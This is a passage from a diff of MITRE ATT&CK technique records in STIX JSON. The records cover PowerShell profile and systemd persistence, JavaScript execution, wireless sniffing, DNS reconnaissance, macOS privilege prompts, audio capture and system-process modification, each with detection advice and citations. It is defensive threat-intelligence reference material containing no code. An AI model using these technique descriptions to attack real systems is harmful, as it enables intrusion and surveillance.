PowerShell Profiles)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Allen DeRyke, ICE", + "Matt Green, @mgreen27" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet)(Citation: Microsoft Profiles) Example profile locations (user defaults as well as program-specific) include:\n\n* $PsHome\\Profile.ps1\n* $PsHome\\Microsoft.{HostProgram}_profile.ps1\n* $Home\\\\\\[My ]Documents\\PowerShell\\Profile.ps1\n* $Home\\\\\\[My ]Documents\\PowerShell\\Microsoft.{HostProgram}_profile.ps1\n\nMonitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "created": "2020-01-24T15:11:02.758Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/013", + "external_id": "T1546.013" + }, + { + "source_name": "Wits End and Shady PowerShell Profiles", + "description": "DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege Elevation using the Powershell Profile. Retrieved July 8, 2019.", + "url": "https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html" + }, + { + "source_name": "ESET Turla PowerShell May 2019", + "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.", + "url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" + }, + { + "source_name": "Malware Archaeology PowerShell Cheat Sheet", + "description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.", + "url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf" + }, + { + "source_name": "Microsoft About Profiles", + "description": "Microsoft. (2017, November 29). About Profiles. Retrieved June 14, 2019.", + "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6" + }, + { + "source_name": "Microsoft Profiles", + "description": "Microsoft. (2021, September 27). about_Profiles. Retrieved February 4, 2022.", + "url": "https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "JavaScript", + "description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Cody Thomas, SpecterOps" + ], + "x_mitre_detection": "Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nMonitor for execution of JXA through osascript and usage of OSAScript API that may be related to other suspicious behavior occurring on the system.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "created": "2020-06-23T19:12:24.924Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059/007", + "external_id": "T1059.007" + }, + { + "source_name": "NodeJS", + "description": "OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.", + "url": "https://nodejs.org/" + }, + { + "source_name": "JScrip May 2018", + "description": "Microsoft. (2018, May 31). Translating to JScript. Retrieved June 23, 2020.", + "url": "https://docs.microsoft.com/windows/win32/com/translating-to-jscript" + }, + { + "source_name": "Microsoft JScript 2007", + "description": "Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript …. Retrieved June 23, 2020.", + "url": "https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript" + }, + { + "source_name": "Microsoft Windows Scripts", + "description": "Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved June 23, 2020.", + "url": "https://docs.microsoft.com/scripting/winscript/windows-script-interfaces" + }, + { + "source_name": "Apple About Mac Scripting 2016", + "description": "Apple. (2016, June 13). About Mac Scripting. Retrieved April 14, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html" + }, + { + "source_name": "SpecterOps JXA 2020", + "description": "Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, 2021.", + "url": "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5" + }, + { + "source_name": "SentinelOne macOS Red Team", + "description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.", + "url": "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/" + }, + { + "source_name": "Red Canary Silver Sparrow Feb2021", + "description": "Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s wings: Outing macOS malware before it takes flight. Retrieved April 20, 2021.", + "url": "https://redcanary.com/blog/clipping-silver-sparrows-wings/" + }, + { + "source_name": "MDSec macOS JXA and VSCode", + "description": "Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans with VSCode Extensions. Retrieved April 20, 2021.", + "url": "https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:56:59.193Z", + "name": "Wireless Sniffing", + "description": "Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. (Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018) The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum. \n\nAdversaries may capture RF communications by using specialized hardware, such as software defined radio (SDR), handheld radio, or a computer with radio demodulator tuned to the communication frequency. (Citation: Bastille April 2017) Information transmitted over a wireless medium may be captured in-transit whether the sniffing device is the intended destination or not. This technique may be particularly useful to an adversary when the communications are not encrypted. (Citation: Gallagher, S. April 2017) \n\nIn the 2017 Dallas Siren incident, it is suspected that adversaries likely captured wireless command message broadcasts on a 700 MHz frequency during a regular test of the system. These messages were later replayed to trigger the alarm systems. (Citation: Gallagher, S. April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ICSCoE Japan" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0887", + "external_id": "T0887" + }, + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + }, + { + "source_name": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018", + "description": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. 2018, April Guide to Industrial Wireless Systems Deployments Retrieved. 2020/12/01 ", + "url": "https://nvlpubs.nist.gov/nistpubs/ams/NIST.AMS.300-4.pdf" + }, + { + "source_name": "Gallagher, S. April 2017", + "description": "Gallagher, S. 2017, April 12 Pirate radio: Signal spoof set off Dallas emergency sirens, not network hack Retrieved. 2020/12/01 ", + "url": "https://arstechnica.com/information-technology/2017/04/dallas-siren-hack-used-radio-signals-to-spoof-alarm-says-city-manager/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-21T14:32:48.393Z", + "name": "DNS", + "description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jannie Li, Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", + "created": "2020-10-02T15:47:10.102Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1590/002", + "external_id": "T1590.002" + }, + { + "source_name": "Circl Passive DNS", + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", + "url": "https://www.circl.lu/services/passive-dns/" + }, + { + "source_name": "DNS Dumpster", + "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", + "url": "https://dnsdumpster.com/" + }, + { + "source_name": "Sean Metcalf Twitter DNS Records", + "description": "Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.", + "url": "https://twitter.com/PyroTek3/status/1126487227712921600/photo/1" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Systemd Service", + "description": "Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands. \n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Tony Lambert, Red Canary" + ], + "x_mitre_detection": "Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.\n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAuditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "root", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e", + "created": "2019-04-23T15:34:30.008Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1501", + "external_id": "T1501" + }, + { + "source_name": "Linux man-pages: systemd January 2014", + "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. Retrieved April 23, 2019.", + "url": "http://man7.org/linux/man-pages/man1/systemd.1.html" + }, + { + "source_name": "Freedesktop.org Linux systemd 29SEP2018", + "description": "Freedesktop.org. (2018, September 29). systemd System and Service Manager. Retrieved April 23, 2019.", + "url": "https://www.freedesktop.org/wiki/Software/systemd/" + }, + { + "source_name": "Anomali Rocke March 2019", + "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.", + "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" + }, + { + "source_name": "gist Arch package compromise 10JUL2018", + "description": "Catalin Cimpanu. (2018, July 10). ~x file downloaded in public Arch package compromise. Retrieved April 23, 2019.", + "url": "https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a" + }, + { + "source_name": "Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018", + "description": "Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.", + "url": "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/" + }, + { + "source_name": "acroread package compromised Arch Linux Mail 8JUL2018", + "description": "Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved April 23, 2019.", + "url": "https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html" + }, + { + "source_name": "Rapid7 Service Persistence 22JUNE2016", + "description": "Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.", + "url": "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Elevated Execution with Prompt", + "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Erika Noerenberg, @gutterchurl, Carbon Black", + "Jimmy Astle, @AstleJimmy, Carbon Black" + ], + "x_mitre_detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "root" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca", + "created": "2019-08-08T14:29:37.108Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1514", + "external_id": "T1514" + }, + { + "source_name": "AppleDocs AuthorizationExecuteWithPrivileges", + "description": "Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. Retrieved August 8, 2019.", + "url": "https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg" + }, + { + "source_name": "Death by 1000 installers; it's all broken!", + "description": "Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019.", + "url": "https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8" + }, + { + "source_name": "Carbon Black Shlayer Feb 2019", + "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.", + "url": "https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/" + }, + { + "source_name": "OSX Coldroot RAT", + "description": "Patrick Wardle. (2018, February 17). Tearing Apart the Undetected (OSX)Coldroot RAT. Retrieved August 8, 2019.", + "url": "https://objective-see.com/blog/blog_0x2A.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-23T22:53:18.389Z", + "name": "Audio Capture", + "description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "created": "2017-05-31T21:31:34.528Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1123", + "external_id": "T1123" + }, + { + "source_name": "ESET Attor Oct 2019", + "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-15T14:14:03.942Z", + "name": "Create or Modify System Process", + "description": "Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) \n\nAdversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect. \n\nServices, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. \n\nCommand-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. \n\nMonitor for changes to files associated with system-level processes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux", + "Containers" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "created": "2020-01-10T16:03:18.865Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1543", + "external_id": "T1543" + }, + { + "source_name": "AppleDocs Launch Agent Daemons", + "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", + "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html" + }, + { + "source_name": "TechNet Services", + "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx" + }, + { + "source_name": "OSX Malware Detection", + "description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.", + "url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "External Remote Services", + "description": "Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)\n\nAccess to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.\n\nAccess may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)", + "kill_chain_phases": 